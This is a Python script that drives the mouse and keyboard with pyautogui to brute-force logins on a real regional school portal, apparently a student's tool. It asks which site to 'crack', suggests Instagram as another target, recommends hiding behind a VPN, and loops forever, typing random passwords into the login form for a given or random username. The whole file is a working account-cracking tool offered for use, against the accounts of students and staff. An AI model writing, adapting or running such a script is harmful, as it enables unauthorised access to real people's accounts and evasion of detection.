'''Miguel Atiénzar Gisbert Version 1.3 (Stable)
You can ajust it for other pages :)
Don't be evil!
'''
import time
import os
import random
import pyautogui as pg

characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ<=>@#%&+"
def withusername():
    username = input("Enter user name >>> ")
    pg.hotkey("win","r")
    pg.typewrite(url)
    pg.press("enter")
    time.sleep(4)
    time.sleep(0.5)
    lenght = random.randint(0,16)
    password = ""
    password = password.join([random.choice(characters) for i in range(lenght)])
    pg.moveTo(1356, 371)
    pg.doubleClick()
    pg.press('del')
    time.sleep(2)
    pg.click()
    pg.typewrite(username)
    time.sleep(0.2)
    pg.moveTo(1308, 473)
    time.sleep(1)
    pg.doubleClick()
    pg.press('del')
    time.sleep(0.5)    
    pg.click()
    pg.typewrite(password)
    time.sleep(0.2)
    pg.press("enter")
    time.sleep(4)
    while True:
        time.sleep(0.5)
        lenght = random.randint(0,16)
        password = ""
        password = password.join([random.choice(characters) for i in range(lenght)])
        pg.moveTo(1209, 695)
        pg.doubleClick()
        pg.press('del')
        time.sleep(0.5)
        pg.click()
        pg.typewrite(username)
        time.sleep(0.2)
        pg.moveTo(1223, 747)
        time.sleep(1)
        pg.doubleClick()
        pg.press('del')
        time.sleep(0.5)
        pg.click()
        pg.typewrite(password)
        time.sleep(0.2)
        pg.press("enter")
        time.sleep(4)

def withoutusername():
    username_lenght = random.randint(0,16)
    username = ""
    username = username.join([random.choice(characters) for i in range(username_lenght)])
    pg.hotkey("win","r")
    pg.typewrite(url)
    pg.press("enter")
    time.sleep(2)
    time.sleep(0.5)
    lenght = random.randint(0,16)
    password = ""
    password = password.join([random.choice(characters) for i in range(lenght)])
    pg.moveTo(1356, 371)
    pg.doubleClick()
    pg.press('del')
    time.sleep(0.5)
    pg.click()
    pg.typewrite(username)
    time.sleep(0.2)
    pg.moveTo(1308, 473)
    time.sleep(1)
    pg.doubleClick()
    pg.press('del')
    time.sleep(0.5)
    pg.click()
    pg.typewrite(password)
    time.sleep(0.2)
    pg.press("enter")
    time.sleep(3)
    while True:
        time.sleep(0.5)
        lenght = random.randint(0,16)
        password = ""
        password = password.join([random.choice(characters) for i in range(lenght)])
        pg.moveTo(1209, 695)
        pg.click()
        pg.typewrite(username)
        time.sleep(0.2)
        pg.moveTo(1223, 747)
        time.sleep(1)
        pg.doubleClick()
        pg.press('del')
        time.sleep(0.5)
        pg.click()
        pg.typewrite(password)
        time.sleep(0.2)
        pg.press("enter")
        time.sleep(3)
os.system('cls')
url = "https://aulavirtual.murciaeduca.es/"
print("What site do you wanna crack? Examples: Aulavirtual, Instagram")
site = input(">>> ")
print("Do you have an username that you want to use: Y/N")
selection = input(">>> ")
if selection == "Y":
    time.sleep(0.5)
    withusername()
if selection == "N":
    time.sleep(0.5)
    withoutusername()
if selection == "info":
    print("Cracker for Aula Virtual. It's recomended to use it with an VPN!")
    print("It can take a long time because passwords can be repeated.")
else:
    exit()
